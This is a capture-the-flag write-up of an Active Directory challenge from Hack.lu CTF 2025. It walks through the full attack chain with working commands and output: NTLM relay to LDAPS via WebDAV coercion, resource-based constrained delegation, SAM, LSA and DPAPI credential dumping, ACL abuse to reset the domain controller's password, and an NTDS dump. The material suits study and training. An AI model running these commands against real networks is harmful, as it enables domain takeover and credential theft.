AKTIVKATALOG 2 is an Active Directory challenge from Hack.lu CTF 2025, created by NeffIsBack and Steffen. It involves Relaying, RBCD, and ACLs

Enumeration

I’ll use netexec to generate the hosts file line and add it to /etc/hosts

1
2
3
4
5
6
7
➜  nxc smb targets.txt --generate-hosts-file hosts
SMB 10.244.0.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.lu) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.244.0.11 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
cat hosts
10.244.0.10 DC01.hack.lu hack.lu DC01
10.244.0.11 SRV02.hack.lu SRV02

Let’s start by listing users using null authentication, surprisingly, it worked on the DC and gave us a list of users. One of them had their password in the description field

1
2
3
4
5
6
7
8
9
10
11
12
13
14
➜  nxc smb targets.txt -u '' -p '' --users
SMB 10.244.0.11 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
SMB 10.244.0.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.lu) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.244.0.11 445 SRV02 [-] hack.lu\: STATUS_ACCESS_DENIED
SMB 10.244.0.10 445 DC01 [+] hack.lu\:
SMB 10.244.0.10 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.244.0.10 445 DC01 Gäst <never> 0 Fördefinierat gästkonto för datorn/domänen
SMB 10.244.0.10 445 DC01 ta_bort.mig 2025-10-16 17:40:04 0 Praktikant: Lär sig Active Directory och hämtar kaffe med samma entusiasm. LjtLNg37LdcZin73
SMB 10.244.0.10 445 DC01 maja.lindgren 2025-10-16 17:40:04 0 Helpdesk-hjälte: Frågar alltid 'har du provat att starta om?' innan hon räddar dagen.
SMB 10.244.0.10 445 DC01 Freja.Lund 2025-10-16 17:40:04 0 Dekorationsguru: Gör hyllor glada. Vattnar växter mer punktligt än cronjobs.
SMB 10.244.0.10 445 DC01 Sven.Andersson 2025-10-16 17:40:04 0 Skruvkung: Monterar problem snabbare än manualen hinner öppnas.
SMB 10.244.0.10 445 DC01 Bjorn.Ek 2025-10-16 17:40:04 0 Instruktionsartist: Ritar manualer som ingen läser men alla behöver.
SMB 10.244.0.10 445 DC01 [*] Enumerated 6 local users: HACK
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

ta_bort.mig:LjtLNg37LdcZin73

The creds above do work

1
2
3
➜  nxc ldap dc01.hack.lu -u 'ta_bort.mig' -p 'LjtLNg37LdcZin73'
LDAP 10.244.0.10 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hack.lu) (signing:None) (channel binding:Never)
LDAP 10.244.0.10 389 DC01 [+] hack.lu\ta_bort.mig:LjtLNg37LdcZin73

We can also try listing shares, but all are default in this case

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
➜  nxc smb targets.txt -u 'ta_bort.mig' -p 'LjtLNg37LdcZin73' --shares
SMB 10.244.0.11 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
SMB 10.244.0.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.lu) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.244.0.11 445 SRV02 [+] hack.lu\ta_bort.mig:LjtLNg37LdcZin73
SMB 10.244.0.10 445 DC01 [+] hack.lu\ta_bort.mig:LjtLNg37LdcZin73
SMB 10.244.0.11 445 SRV02 [*] Enumerated shares
SMB 10.244.0.11 445 SRV02 Share Permissions Remark
SMB 10.244.0.11 445 SRV02 ----- ----------- ------
SMB 10.244.0.11 445 SRV02 ADMIN$ Fjärradmin
SMB 10.244.0.11 445 SRV02 C$ Standardresurs
SMB 10.244.0.11 445 SRV02 IPC$ READ Fjärr-IPC
SMB 10.244.0.10 445 DC01 [*] Enumerated shares
SMB 10.244.0.10 445 DC01 Share Permissions Remark
SMB 10.244.0.10 445 DC01 ----- ----------- ------
SMB 10.244.0.10 445 DC01 ADMIN$ Fjärradmin
SMB 10.244.0.10 445 DC01 C$ Standardresurs
SMB 10.244.0.10 445 DC01 IPC$ READ Fjärr-IPC
SMB 10.244.0.10 445 DC01 NETLOGON READ Resurs f”r serverinloggning
SMB 10.244.0.10 445 DC01 SYSVOL READ Resurs f”r serverinloggning
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Bloodhound

With valid credentials in hand, we can run Bloodhound to gain a better understanding of the network and the permissions our users have

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
➜  bloodhound-python -c all -u 'ta_bort.mig' -p 'LjtLNg37LdcZin73' -d hack.lu -dc dc01.hack.lu -ns 10.244.0.10 --disable-pooling -w1 --dns-timeout 30 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: hack.lu
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.hack.lu
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.hack.lu
INFO: Found 9 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 1 workers
INFO: Querying computer: SRV02.hack.lu
INFO: Querying computer: DC01.hack.lu
INFO: Done in 00M 27S
INFO: Compressing output into 20251020152455_bloodhound.zip

However, our current user can’t do much

LDAP Signing & Channel Binding

We notice something very important here: there’s no LDAP signing or channel binding on the DC, this means NTLM authentication can be relayed. To learn more about this topic I suggest you read this blogpost from TrustedSec. More resources are listed in the resources section at the end of this writeup

1
2
➜  nxc ldap dc01.hack.lu
LDAP 10.244.0.10 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hack.lu) (signing:None) (channel binding:Never)

Plan

The first thing we’ll do is coerce the authentication from SRV02, which is running the WebClient service. This will use the SRV02$ machine account to authenticate to our machine. Since WebDAV uses HTTP, the machine will authenticate using NTLM and because it’s a web request, we’ll be able to relay the authentication to LDAP, as signing isn’t enforced.

The relay will let us write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the target object then impersonate any user on the machine

NTLM Relay to LDAPS

We can use the webdav module from netexec to check if the WebClient Service is enabled on SRV02, which is the case here

1
2
3
4
➜  nxc smb srv02.hack.lu -u 'ta_bort.mig' -p 'LjtLNg37LdcZin73' -M webdav
SMB 10.244.0.11 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
SMB 10.244.0.11 445 SRV02 [+] hack.lu\ta_bort.mig:LjtLNg37LdcZin73
WEBDAV 10.244.0.11 445 SRV02 WebClient Service enabled on: 10.244.0.11

We also check the Machine Account Quota value using the maq module

1
2
3
4
5
➜  nxc ldap dc01.hack.lu -u 'ta_bort.mig' -p 'LjtLNg37LdcZin73' -M maq
LDAP 10.244.0.10 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hack.lu) (signing:None) (channel binding:Never)
LDAP 10.244.0.10 389 DC01 [+] hack.lu\ta_bort.mig:LjtLNg37LdcZin73
MAQ 10.244.0.10 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.244.0.10 389 DC01 MachineAccountQuota: 10

As you can see, the MachineAccountQuota value is 10, which is the default. This will let us create a machine account later for our RBCD attack, since each machine account comes with an SPN.

The only thing left now is to add a new DNS record that points to our attacker machine, because the WebClient connection string needs to be a hostname, not an IP address. This is something that’s allowed by default for all domain users.

Let’s use the dnstool.py tool from the krbrelayx repo

1
2
3
4
5
6
➜  dnstool.py -u 'hack.lu\ta_bort.mig' -p 'LjtLNg37LdcZin73' 10.244.0.10 -a add -d 10.244.2.2 -r 'pwned.hack.lu'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Let’s verify that the DNS record has been created and is pointing to our attacker’s IP address

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
➜  dig pwned.hack.lu @dc01.hack.lu

; <<>> DiG 9.18.39-0ubuntu0.24.04.1-Ubuntu <<>> pwned.hack.lu @dc01.hack.lu
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59770
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;pwned.hack.lu. IN A

;; ANSWER SECTION:
pwned.hack.lu. 180 IN A 10.244.2.2

;; Query time: 97 msec
;; SERVER: 10.244.0.10#53(dc01.hack.lu) (UDP)
;; WHEN: Mon Oct 20 14:30:50 CET 2025
;; MSG SIZE rcvd: 58

Alternatively, we can use dnstool’s query parameter

1
2
3
4
5
6
7
8
9
➜  dnstool.py -u 'hack.lu\ta_bort.mig' -p 'LjtLNg37LdcZin73' 10.244.0.10 -a query -d 10.244.2.2 -r 'pwned.hack.lu'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found record pwned
DC=pwned,DC=hack.lu,CN=MicrosoftDNS,DC=DomainDnsZones,DC=hack,DC=lu
[+] Record entry:
- Type: 1 (A) (Serial: 36)
- Address: 10.244.2.2

Next, we setup our listener for relaying the authentication to LDAP on the DC with the --delegate-access flag to write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on SRV02

It’s also possible to relay to LDAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
➜  ntlmrelayx.py -t ldaps://dc01.hack.lu -smb2support --delegate-access
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay disabled

[*] Servers started, waiting for connections

Finally, we can use dementor (or any similar like PetitPotam,…) to coerce Webclient HTTP authentication

1
2
3
4
5
6
7
(venv) ➜  python3 NetNTLMtoSilverTicket/dementor.py -d "hack.lu" -u "ta_bort.mig" -p "LjtLNg37LdcZin73" pwned@80/x 10.244.0.11
[*] connecting to 10.244.0.11
[*] bound to spoolss
[*] getting context handle...
[*] sending RFFPCNEX...
[*] Got expected RPC_S_SERVER_UNAVAILABLE exception. Attack worked
[*] done!

Nice! the LDAP relay was successful, and ntlmrelayx.py created a machine account for us to delegate to SRV02

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] (HTTP): Connection from 10.244.0.11 controlled, attacking target ldaps://dc01.hack.lu
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] (HTTP): Authenticating connection from HACK/SRV02$@10.244.0.11 against ldaps://dc01.hack.lu SUCCEED [1]
[*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Enumerating relayed user's privileges. This may take a while on large domains
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] All targets processed!
[*] (HTTP): Connection from 10.244.0.11 controlled, but there are no more targets left!
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] All targets processed!
[*] (HTTP): Connection from 10.244.0.11 controlled, but there are no more targets left!
[*] (HTTP): Client requested path: /x/pipe
[*] (HTTP): Client requested path: /x/pipe
[*] All targets processed!
[*] (HTTP): Connection from 10.244.0.11 controlled, but there are no more targets left!
[*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Attempting to create computer in: CN=Computers,DC=hack,DC=lu
[*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Adding new computer with username: SKQUJUFW$ and password: /7@R:6{i6r7+9Na result: OK
[*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Delegation rights modified succesfully!
[*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> SKQUJUFW$ can now impersonate users on SRV02$ via S4U2Proxy

We can now request a service ticket as Administrator on SRV02

1
2
3
4
5
6
7
8
9
10
11
12
13
➜  getST.py -impersonate Administrator -spn cifs/srv02.hack.lu -dc-ip 10.244.0.10 hack.lu/'SKQUJUFW$':'/7@R:6{i6r7+9Na'
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_srv02.hack.lu@HACK.LU.ccache
export KRB5CCNAME=Administrator@cifs_srv02.hack.lu@HACK.LU.ccache
➜ nxc smb srv02.hack.lu --use-kcache
SMB srv02.hack.lu 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
SMB srv02.hack.lu 445 SRV02 [+] hack.lu\Administrator from ccache (Pwn3d!)

Or we can automate all of that using the --delegate option from netexec

1
2
3
➜  nxc smb srv02.hack.lu -u 'SKQUJUFW$' -p '/7@R:6{i6r7+9Na' --delegate administrator
SMB srv02.hack.lu 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
SMB srv02.hack.lu 445 SRV02 [+] hack.lu\administrator through S4U with SKQUJUFW$ (Pwn3d!)

SRV02 Post Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜  nxc smb srv02.hack.lu -u 'SKQUJUFW$' -p '/7@R:6{i6r7+9Na' --delegate administrator --sam --lsa
SMB srv02.hack.lu 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
SMB srv02.hack.lu 445 SRV02 [+] hack.lu\administrator through S4U with SKQUJUFW$ (Pwn3d!)
SMB srv02.hack.lu 445 SRV02 [*] Dumping SAM hashes
SMB srv02.hack.lu 445 SRV02 Administratör:500:aad3b435b51404eeaad3b435b51404ee:09a38021b2ecb464dda2d27ca8ef5233:::
SMB srv02.hack.lu 445 SRV02 Gäst:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB srv02.hack.lu 445 SRV02 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB srv02.hack.lu 445 SRV02 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:2978613d8f0ce20bcc9b15edcf84b739:::
SMB srv02.hack.lu 445 SRV02 [+] Added 4 SAM hashes to the database
SMB srv02.hack.lu 445 SRV02 [+] Dumping LSA secrets
SMB srv02.hack.lu 445 SRV02 HACK.LU/maja.lindgren:$DCC2$10240#maja.lindgren#b60a72842a22909fb4a8df6503180749: (2025-10-20 12:16:53)
SMB srv02.hack.lu 445 SRV02 HACK\SRV02$:plain_password_hex:5d005e00740050005a0059006b006a0041004500230044007600530023005e00450026002c0056003e00330076005f002d00790037006000770036007600750031003800670060002d0038006f0036002000570020004b00660043006b005e005000510023005a004d0021006f00380024002c0025005d003900640058002a003200400038004e005300230057005f00370048004e0076004800410067005100530038002f0039003c0047006500560079002a00790038006e005a003100680035003d0055007a00610035006e005a002400610077004b006a00790064002b0027002f003a0054006800410049003a00
SMB srv02.hack.lu 445 SRV02 HACK\SRV02$:aad3b435b51404eeaad3b435b51404ee:2789dafd681ed1e069bf270ea4e9c9ad:::
SMB srv02.hack.lu 445 SRV02 dpapi_machinekey:0xad21550b28dc1265f7f03c7991390b2483e68e76
dpapi_userkey:0xe0387b2f2cacb71a60e335c8997cc95ac0cedb6c
SMB srv02.hack.lu 445 SRV02 [+] Dumped 4 LSA secrets to /home/serio/.nxc/logs/lsa/srv02.hack.lu_None_2025-10-20_161836.secrets and /home/serio/.nxc/logs/lsa/srv02.hack.lu_None_2025-10-20_161836.cached

DPAPI

Let’s use the administratör account to look for DPAPI using the --dpapi flag from netexec

1
2
3
4
5
6
➜  nxc smb srv02.hack.lu -u 'administratör' -H 09a38021b2ecb464dda2d27ca8ef5233 --local-auth --dpapi
SMB 10.244.0.11 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:SRV02) (signing:True) (SMBv1:None)
SMB 10.244.0.11 445 SRV02 [+] SRV02\administratör:09a38021b2ecb464dda2d27ca8ef5233 (Pwn3d!)
SMB 10.244.0.11 445 SRV02 [*] Collecting DPAPI masterkeys, grab a coffee and be patient...
SMB 10.244.0.11 445 SRV02 [+] Got 4 decrypted masterkeys. Looting secrets...
SMB 10.244.0.11 445 SRV02 [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{03AB09A0-D6E7-4FE2-9005-5F21B10E3DD1} - HACK\maja.lindgren:Z4f8hF2t#K3HJsfGJX!&

Nice! it dumped the password of the user maja.lindgren

DC01 Takeover

Looking at bloodhound, we can see that this user has some interesting permissions

  • maja.lindgren has AddMember over KONTOANSVARIGA group
  • KONTOANSVARIGA has AllExtendedRights over DC01

That’s a nice path to pwn the DC :)

First, let’s add our user to the KONTOANSVARIGA group using BloodyAD

1
2
➜  bloodyAD --host dc01.hack.lu -d hack.lu -u maja.lindgren -p 'Z4f8hF2t#K3HJsfGJX!&' add groupMember KONTOANSVARIGA maja.lindgren
[+] maja.lindgren added to KONTOANSVARIGA

Now that we have the AllExtendedRights privilege over the DC, we can just change the DC01$ account password and perform a DCSync

1
2
➜  bloodyAD --host dc01.hack.lu -d hack.lu -u maja.lindgren -p 'Z4f8hF2t#K3HJsfGJX!&' set password dc01$ P@ssw0rd
[+] Password changed successfully!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
➜  nxc smb dc01.hack.lu -u dc01$ -p P@ssw0rd --ntds
SMB 10.244.0.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.lu) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.244.0.10 445 DC01 [+] hack.lu\dc01$:P@ssw0rd
SMB 10.244.0.10 445 DC01 [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.244.0.10 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.244.0.10 445 DC01 Administratör:500:aad3b435b51404eeaad3b435b51404ee:995c831ca16a0e43a90735ef8a9f62d7:::
SMB 10.244.0.10 445 DC01 Gäst:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.244.0.10 445 DC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:98693ee8f6c3ab1f8f9199a5c0e7f770:::
SMB 10.244.0.10 445 DC01 ta_bort.mig:1103:aad3b435b51404eeaad3b435b51404ee:803650c48c797a53b2370372b15b7f7d:::
SMB 10.244.0.10 445 DC01 maja.lindgren:1104:aad3b435b51404eeaad3b435b51404ee:c8f64ebda9f079e9ab7ab776f409c66f:::
SMB 10.244.0.10 445 DC01 Freja.Lund:1105:aad3b435b51404eeaad3b435b51404ee:a998a530a64e1c5a9d502e0f55ba43d7:::
SMB 10.244.0.10 445 DC01 Sven.Andersson:1106:aad3b435b51404eeaad3b435b51404ee:a9f00a4eb8fe3c2063513a3f0e9cebed:::
SMB 10.244.0.10 445 DC01 Bjorn.Ek:1107:aad3b435b51404eeaad3b435b51404ee:7077bc6c6a3408abf570e554917e1948:::
SMB 10.244.0.10 445 DC01 DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
SMB 10.244.0.10 445 DC01 SRV02$:1108:aad3b435b51404eeaad3b435b51404ee:2789dafd681ed1e069bf270ea4e9c9ad:::
SMB 10.244.0.10 445 DC01 JTYTQCPS$:2101:aad3b435b51404eeaad3b435b51404ee:fa597599bfda059059d4802340a73b15:::
SMB 10.244.0.10 445 DC01 SKQUJUFW$:2102:aad3b435b51404eeaad3b435b51404ee:b138821f62f337e3f3d4111017334315:::

Finally, we can grab our flag

1
2
3
4
5
6
7
➜  nxc smb dc01.hack.lu -u administrator -H 995c831ca16a0e43a90735ef8a9f62d7 --get-file 'Users\\Administratör\\Desktop\\flag.txt' flag.txt
SMB 10.244.0.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.lu) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.244.0.10 445 DC01 [+] hack.lu\administrator:995c831ca16a0e43a90735ef8a9f62d7 (Pwn3d!)
SMB 10.244.0.10 445 DC01 [*] Copying "Users\\Administratör\\Desktop\\flag.txt" to "flag.txt"
SMB 10.244.0.10 445 DC01 [+] File "Users\\Administratör\\Desktop\\flag.txt" was downloaded to "flag.txt"
cat flag.txt
flag{AD_Yet_An0ther_Dis4st3r_e09ec502d5}

That concludes this challenge. I hope you learned something new! 🐱

Resources